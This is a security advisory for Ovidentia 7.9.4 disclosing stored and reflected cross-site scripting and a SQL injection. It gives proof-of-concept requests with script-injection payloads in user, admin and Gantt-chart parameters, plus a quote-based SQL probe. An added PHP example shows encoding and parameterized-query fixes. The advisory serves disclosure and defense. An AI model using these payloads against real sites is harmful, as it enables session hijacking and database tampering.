Ovidentia 7.9.4 Cross Site Scripting / SQL Injection

2013.08.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89, CWE-79

Ovidentia 7.9.4 Multiple Remote Vulnerabilities

Vendor: Cantico
Product web page: http://www.ovidentia.org
Affected version: 7.9.4

Summary: Ovidentia is both a content management system (CMS) and a collaborative environment (Groupware).

Desc: Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, and to execute arbitrary HTML/script code in a user's browser session in the context of an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.7
           MySQL 5.5.25a

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5154
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php

08.08.2013

---

============================================================
#1 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

POST parameters (values shown unencoded; an empty right-hand side is an empty value):

tg=users
idx=Create
pos=A
grp=
widget_filepicker_job_uid[]=52154a53cc0de
user[nickname]="><script>alert(1);</script>
user[password1]=pass123
user[password2]=pass123
user[notifyuser]=0
user[sendpwd]=0
user[sn]=Testingusio
user[mn]=M
user[givenname]=Testa
user[email]="><script>alert(2);</script>

============================================================
#2 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

POST parameters (values shown unencoded; an empty right-hand side is an empty value):

user[id]=2
tg=user
idx=Modify
item=2
pos=
grp=
widget_filepicker_job_uid[]=52154bde9410a
user[nickname]=test
user[setpwd]=0
user[password1]=
user[password2]=
user[sendpwd]=0
user[sn]="><script>alert(3);</script>
user[mn]=M
user[givenname]="><script>alert(4);</script>
user[email]=lab@zeroscience.mk

The stored payload is rendered on the profile edit page:

GET http://localhost/ovidentia/index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP/1.1

============================================================
#3 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

POST parameters (values shown unencoded):

Submit2=Update
idx=modify
item=1
ovmldetail="><script>alert(5);</script>
ovmlembedded="><script>alert(6);</script>
tg=admoc
update=ovmldb

============================================================
#4 - Reflected XSSs
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=users&bupd="><script>alert(7);</script> HTTP/1.1

GET http://localhost/ovidentia/index.php?tg=addon/widgets/groups&idx=get&id_parent="><script>alert(8);</script>&uid=widget_acl99&levels=2&id_delegation=0

GET http://localhost/ovidentia/index.php?tg=admoc&idx=addoc&item="><script>alert(9);</script> HTTP/1.1

GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A"><script>alert(10);</script>&grp=&sSearchText= HTTP/1.1

GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText="><script>alert(11);</script> HTTP/1.1

GET http://localhost/ovidentia/index.php?tg=admfm&idx=modify&fid=1"><script>alert(12);</script> HTTP/1.1

GET http://localhost/ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1

GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1_</script><script>prompt(14)</script>&iIdProject=-1&tg=usrTskMgr

GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1&iIdProject=0_</script><script>prompt(15)</script>&tg=usrTskMgr

GET http://localhost/ovidentia/index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman

============================================================
#5 - SQL Injection
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2
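As an added defender-side illustration (not Ovidentia's code and not part of the original advisory), the PHP below handles the four contexts the PoCs above abuse: an HTML attribute (#1 to #4), an inline script literal (iIdOwner/iIdProject in #4), a URL (urla in #4) and a SQL statement (item in #5). The `$pdo` connection, the `octypes` table and `id` column, and the function names are assumptions.

```php
<?php
// Added example, not Ovidentia's code: per-context handling for the parameters
// the advisory abuses. $pdo, the table/column names and function names are assumed.
declare(strict_types=1);

// HTML body and attribute context (#1-#4): encode on output and always quote the
// attribute, so a value such as "><script>alert(1)</script> stays inert text.
function html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Inline JavaScript context (iIdOwner/iIdProject in #4): emit the value as a JSON
// string literal with < > & ' " hex-escaped, so "</script><script>" cannot break out.
function js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// URL context (urla=javascript:prompt(13) in #4): accept only http(s) targets;
// anything else, including javascript: and data:, yields null for a safe default.
function safeUrl(string $u): ?string {
    $scheme = parse_url($u, PHP_URL_SCHEME);
    return (is_string($scheme) && in_array(strtolower($scheme), ['http', 'https'], true))
        ? $u : null;
}

// SQL context (item=1' in #5): validate the type, then bind it as a parameter
// instead of concatenating it into the DELETE statement.
function deleteType(PDO $pdo, string $rawItem): int {
    if (!ctype_digit($rawItem)) {
        throw new InvalidArgumentException('item must be a positive integer');
    }
    $stmt = $pdo->prepare('DELETE FROM octypes WHERE id = :id'); // table name assumed
    $stmt->execute([':id' => (int) $rawItem]);
    return $stmt->rowCount();
}

// Rendering the same fields the PoCs target, now encoded for their context.
$user  = is_array($_POST['user'] ?? null) ? $_POST['user'] : [];
$nick  = (string) ($user['nickname'] ?? '');
$owner = (string) ($_GET['iIdOwner'] ?? '');
$urla  = (string) ($_GET['urla'] ?? '');
echo '<input name="user[nickname]" value="' . html($nick) . '">';
echo '<script>var owner = ' . js($owner) . ';</script>';
echo '<a href="' . html(safeUrl($urla) ?? '#') . '">link</a>';
```

With the payloads from the PoCs, the attribute value renders as `&quot;&gt;&lt;script&gt;...`, the script literal as `"1_\u003C/script\u003E..."`, the javascript: link collapses to `#`, and the quoted `item` is rejected before any query runs.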

References:

http://www.ovidentia.org
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php
